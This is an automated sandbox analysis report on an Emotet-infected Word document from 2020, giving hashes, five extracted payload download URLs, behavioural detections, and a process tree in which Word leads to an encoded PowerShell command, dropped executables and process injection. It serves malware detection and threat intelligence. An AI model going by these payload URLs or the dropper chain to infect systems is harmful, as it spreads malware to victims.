Analysis
  max time kernel: 142s
  max time network: 148s
  platform: windows10_x64
  resource: win10v200722
  submitted: 13-09-2020 06:31
  Static task: static1
  Behavioral task: behavioral1
  Sample: emotet_e1_2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8_2020-09-13__063002._doc.doc
  Resource: win7v200722
General
  Target: emotet_e1_2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8_2020-09-13__063002._doc.doc
  Size: 169KB
  MD5: 9bcd7831593b18eb2fc20abb950776e0
  SHA1: 94fce0e45271cd1dc5ff594f886146c88b5bdf75
  SHA256: 2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8
  SHA512: ce5e923278b315e334274b0b1f9434aaa2851135fb0fb4f147b8e123da1f595e50a70fc47079f8f3c8c5c6a43f9b5b04a5dbf799f29491bb73d716304892dfdc
Malware Config

Extracted (document payload URLs):
  http://sampling-group.com/J0Eubtq06/
  http://www.weddingsday.co.uk/docs/1oYncTNHDu/
  http://sasystemsuk.com/recruit/sl979/
  http://wellparts.net/cgi-bin/qAj081/
  http://volkanakbalik.com/_inc/2W/

Extracted: emotet C2 address list (78 IP:port entries)
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powersheLL.exe
  description | pid | pid_target | process | target process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1492 | 3116 | (empty) | powersheLL.exe

Emotet Payload (4 IoCs)
Detects Emotet payload in memory.
  resource | yara_rule
  behavioral2/memory/2192-14-0x0000000000540000-0x000000000054C000-memory.dmp | emotet (2 entries)
  behavioral2/memory/3904-18-0x0000000000500000-0x000000000050C000-memory.dmp | emotet (2 entries)

Blacklisted process makes network request (1 IoC)
Processes: powersheLL.exe
  flow | pid | process
  20 | 1492 | powersheLL.exe

Executes dropped EXE (2 IoCs)
Processes: 848.exe, mos.exe
  pid | process
  2192 | 848.exe
  3904 | mos.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: WINWORD.EXE
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\International\Geo\Nation | WINWORD.EXE

Drops file in System32 directory (1 IoC)
Processes: 848.exe
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\LocationFrameworkInternalPS\mos.exe | 848.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes: WINWORD.EXE
  pid | process
  728 | WINWORD.EXE (2 entries)

Suspicious behavior: EnumeratesProcesses (19 IoCs)
Processes: powersheLL.exe, mos.exe
  pid | process
  1492 | powersheLL.exe (3 entries)
  3904 | mos.exe (16 entries)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: powersheLL.exe
  description | pid | process
  Token: SeDebugPrivilege | 1492 | powersheLL.exe

Suspicious use of SetWindowsHookEx (11 IoCs)
Processes: WINWORD.EXE, 848.exe, mos.exe
  pid | process
  728 | WINWORD.EXE (9 entries)
  2192 | 848.exe
  3904 | mos.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes: 848.exe
  description | pid | process | target process
  PID 2192 wrote to memory of 3904 | 2192 | 848.exe | mos.exe (3 entries)
Processes

Level 1: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8_2020-09-13__063002._doc.doc" /o ""
  - Checks computer location settings
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

Level 1: C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
  Command line: powersheLL -e [encoded command removed]
  - Process spawned unexpected child process
  - Blacklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

Level 1: C:\Users\Admin\848.exe
  Command line: C:\Users\Admin\848.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SysWOW64\LocationFrameworkInternalPS\mos.exe
    Command line: "C:\Windows\SysWOW64\LocationFrameworkInternalPS\mos.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
  C:\Users\Admin\848.exe
  C:\Windows\SysWOW64\LocationFrameworkInternalPS\mos.exe
  memory/728-0-0x00007FFFF7060000-0x00007FFFF7726000-memory.dmp  Filesize: 6.8MB
  memory/1492-8-0x00007FFFEF710000-0x00007FFFF00FC000-memory.dmp  Filesize: 9.9MB
  memory/1492-9-0x000001E3602E0000-0x000001E3602E1000-memory.dmp  Filesize: 4KB
  memory/1492-10-0x000001E360490000-0x000001E360491000-memory.dmp  Filesize: 4KB
  memory/2192-13-0x0000000000601000-0x0000000000604000-memory.dmp  Filesize: 12KB
  memory/2192-14-0x0000000000540000-0x000000000054C000-memory.dmp  Filesize: 48KB
  memory/3904-15-0x0000000000000000-mapping.dmp
  memory/3904-17-0x0000000000650000-0x0000000000651000-memory.dmp  Filesize: 4KB
  memory/3904-18-0x0000000000500000-0x000000000050C000-memory.dmp  Filesize: 48KB